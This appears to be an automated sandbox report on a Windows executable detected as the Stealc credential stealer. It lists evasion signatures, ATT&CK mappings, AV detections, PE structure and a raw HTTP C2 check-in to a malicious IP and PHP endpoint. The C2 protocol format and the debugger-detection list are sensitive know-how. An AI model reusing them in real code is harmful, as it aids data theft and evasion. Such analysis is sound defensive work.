                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00EEBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EEDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE1160 GetSystemInfo,ExitProcess,0_2_00EE1160
                Source: file.exe, file.exe, 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1627926455.00000000016E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1627926455.00000000016B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                Source: file.exe, 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarei
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13611
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13608
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13628
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13623
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13663
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE45C0 VirtualProtect ?,00000004,00000100,000000000_2_00EE45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EF9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF9750 mov eax, dword ptr fs:[00000030h]0_2_00EF9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00EF78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2552, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00EF9600
                Source: file.exe, file.exe, 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: XProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00EF7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00EF7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00EF7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00EF7A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1586910979.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2552, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1586910979.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2552, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe45%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phpWfile.exe, 00000000.00000002.1627926455.00000000016B3000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpgfile.exe, 00000000.00000002.1627926455.00000000016B3000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.37
                    		unknownPortugal
                    		206894WHOLESALECONNECTIONSNLtrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1525809
                    Start date and time:2024-10-04 16:37:18 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 23s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 80%
                    • Number of executed functions: 19
                    • Number of non-executed functions: 81
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.37niko.exeGet hashmaliciousAmadey, Credential Flusher, Stealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37/e2b1563c6670f193.php

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLniko.exeGet hashmaliciousAmadey, Credential Flusher, Stealc, VidarBrowse
                    • 185.215.113.103
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    Setup.exeGet hashmaliciousRedLineBrowse
                    • 185.215.113.22
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    file.exeGet hashmaliciousStealcBrowse
                    • 185.215.113.37
                    Aura.exeGet hashmaliciousRedLineBrowse
                    • 185.215.113.22
                    file.exeGet hashmaliciousStealc, VidarBrowse
                    • 185.215.113.37

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    No created / dropped files found

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.94691415061976
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'831'424 bytes
                    MD5:8baeb58f65c1b9077a14792bd25a17f3
                    SHA1:9908569a2920d3693bb0eba3692c48132a5b25a9
                    SHA256:f9c5550df902ffa0b701eb230cb26c712d35688efcae92636488915de920c6a8
                    SHA512:00b3182acb2fd6ad034057eb35d6030bb4765c38ef0ad0cd0d7a424943ef5ce642aa171a02988d403921286c15175738cd9dfebdb161940e41d4e18f4f31b5e8
                    SSDEEP:49152:8o6yjQsVYdT3lEPmc+KRDxmNkgHWAx9QC5Iy:1666hqPm0jmqPU5Iy
                    TLSH:2A853322471A637EEE9937BB2D671F711A90F3C0794162612A172A1ED523FF23B14D4C
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                    File Icon

                    Icon Hash:00928e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0xa92000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                    Entrypoint Preview

                    Instruction
                    jmp 00007FF8E90A8A6Ah

                    Rich Headers

                    Programming Language:
                    • [C++] VS2010 build 30319
                    • [ASM] VS2010 build 30319
                    • [ C ] VS2010 build 30319
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [LNK] VS2010 build 30319

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x25b0000x22800c254acb27ac622c5475233e3cf6db1cdunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x25e0000x29a0000x20086d765457e5a74e54b72c1607480d0bfunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    aufxidhi0x4f80000x1990000x199000a3314062c12bfe42ba1175fd67836522False0.9946545738462714data7.9520679718814815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    uxstyozv0x6910000x10000x400d9137b2f9daf76f364280e959e2eafb7False0.7587890625data6.016050386408088IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x6920000x30000x2200e47df74b20f86bbcc67b5f274d6f6df8False0.05618106617647059DOS executable (COM)0.659888870078411IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                    Imports

                    DLLImport
                    kernel32.dlllstrcpy

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-10-04T16:38:40.006563+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.949706185.215.113.3780TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Oct 4, 2024 16:38:38.850904942 CEST4970680192.168.2.9185.215.113.37
                    Oct 4, 2024 16:38:38.862205029 CEST8049706185.215.113.37192.168.2.9
                    Oct 4, 2024 16:38:38.862350941 CEST4970680192.168.2.9185.215.113.37
                    Oct 4, 2024 16:38:38.862658024 CEST4970680192.168.2.9185.215.113.37
                    Oct 4, 2024 16:38:38.877414942 CEST8049706185.215.113.37192.168.2.9
                    Oct 4, 2024 16:38:39.583302021 CEST8049706185.215.113.37192.168.2.9
                    Oct 4, 2024 16:38:39.583431959 CEST4970680192.168.2.9185.215.113.37
                    Oct 4, 2024 16:38:39.771542072 CEST4970680192.168.2.9185.215.113.37
                    Oct 4, 2024 16:38:39.777360916 CEST8049706185.215.113.37192.168.2.9
                    Oct 4, 2024 16:38:40.006454945 CEST8049706185.215.113.37192.168.2.9
                    Oct 4, 2024 16:38:40.006562948 CEST4970680192.168.2.9185.215.113.37
                    Oct 4, 2024 16:38:42.954617977 CEST4970680192.168.2.9185.215.113.37

                    HTTP Request Dependency Graph

                    • 185.215.113.37

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.949706185.215.113.37802552C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Oct 4, 2024 16:38:38.862658024 CEST89OUTGET / HTTP/1.1
                    Host: 185.215.113.37
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Oct 4, 2024 16:38:39.583302021 CEST203INHTTP/1.1 200 OK
                    Date: Fri, 04 Oct 2024 14:38:39 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Oct 4, 2024 16:38:39.771542072 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDG
                    Host: 185.215.113.37
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 34 42 42 33 31 42 36 44 44 38 31 32 36 33 38 30 30 30 39 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 47 2d 2d 0d 0a
                    Data Ascii: ------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="hwid"5D4BB31B6DD81263800096------HDBGDHDAECBGDHJKFIDGContent-Disposition: form-data; name="build"doma------HDBGDHDAECBGDHJKFIDG--
                    Oct 4, 2024 16:38:40.006454945 CEST210INHTTP/1.1 200 OK
                    Date: Fri, 04 Oct 2024 14:38:39 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 59 6d 78 76 59 32 73 3d
                    Data Ascii: YmxvY2s=


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    System Behavior

                    General

                    Target ID:0
                    Start time:10:38:32
                    Start date:04/10/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0xee0000
                    File size:1'831'424 bytes
                    MD5 hash:8BAEB58F65C1B9077A14792BD25A17F3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1586910979.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:9.1%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:10.1%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:24
                      execution_graph 13454 ef69f0 13499 ee2260 13454->13499 13478 ef6a64 13479 efa9b0 4 API calls 13478->13479 13480 ef6a6b 13479->13480 13481 efa9b0 4 API calls 13480->13481 13482 ef6a72 13481->13482 13483 efa9b0 4 API calls 13482->13483 13484 ef6a79 13483->13484 13485 efa9b0 4 API calls 13484->13485 13486 ef6a80 13485->13486 13651 efa8a0 13486->13651 13488 ef6b0c 13655 ef6920 GetSystemTime 13488->13655 13489 ef6a89 13489->13488 13491 ef6ac2 OpenEventA 13489->13491 13494 ef6ad9 13491->13494 13495 ef6af5 CloseHandle Sleep 13491->13495 13498 ef6ae1 CreateEventA 13494->13498 13497 ef6b0a 13495->13497 13497->13489 13498->13488 13852 ee45c0 13499->13852 13501 ee2274 13502 ee45c0 2 API calls 13501->13502 13503 ee228d 13502->13503 13504 ee45c0 2 API calls 13503->13504 13505 ee22a6 13504->13505 13506 ee45c0 2 API calls 13505->13506 13507 ee22bf 13506->13507 13508 ee45c0 2 API calls 13507->13508 13509 ee22d8 13508->13509 13510 ee45c0 2 API calls 13509->13510 13511 ee22f1 13510->13511 13512 ee45c0 2 API calls 13511->13512 13513 ee230a 13512->13513 13514 ee45c0 2 API calls 13513->13514 13515 ee2323 13514->13515 13516 ee45c0 2 API calls 13515->13516 13517 ee233c 13516->13517 13518 ee45c0 2 API calls 13517->13518 13519 ee2355 13518->13519 13520 ee45c0 2 API calls 13519->13520 13521 ee236e 13520->13521 13522 ee45c0 2 API calls 13521->13522 13523 ee2387 13522->13523 13524 ee45c0 2 API calls 13523->13524 13525 ee23a0 13524->13525 13526 ee45c0 2 API calls 13525->13526 13527 ee23b9 13526->13527 13528 ee45c0 2 API calls 13527->13528 13529 ee23d2 13528->13529 13530 ee45c0 2 API calls 13529->13530 13531 ee23eb 13530->13531 13532 ee45c0 2 API calls 13531->13532 13533 ee2404 13532->13533 13534 ee45c0 2 API calls 13533->13534 13535 ee241d 13534->13535 13536 ee45c0 2 API calls 13535->13536 13537 ee2436 13536->13537 13538 ee45c0 2 API calls 13537->13538 13539 ee244f 13538->13539 13540 ee45c0 2 API calls 13539->13540 13541 ee2468 13540->13541 13542 ee45c0 2 API calls 13541->13542 13543 ee2481 13542->13543 13544 ee45c0 2 API calls 13543->13544 13545 ee249a 13544->13545 13546 ee45c0 2 API calls 13545->13546 13547 ee24b3 13546->13547 13548 ee45c0 2 API calls 13547->13548 13549 ee24cc 13548->13549 13550 ee45c0 2 API calls 13549->13550 13551 ee24e5 13550->13551 13552 ee45c0 2 API calls 13551->13552 13553 ee24fe 13552->13553 13554 ee45c0 2 API calls 13553->13554 13555 ee2517 13554->13555 13556 ee45c0 2 API calls 13555->13556 13557 ee2530 13556->13557 13558 ee45c0 2 API calls 13557->13558 13559 ee2549 13558->13559 13560 ee45c0 2 API calls 13559->13560 13561 ee2562 13560->13561 13562 ee45c0 2 API calls 13561->13562 13563 ee257b 13562->13563 13564 ee45c0 2 API calls 13563->13564 13565 ee2594 13564->13565 13566 ee45c0 2 API calls 13565->13566 13567 ee25ad 13566->13567 13568 ee45c0 2 API calls 13567->13568 13569 ee25c6 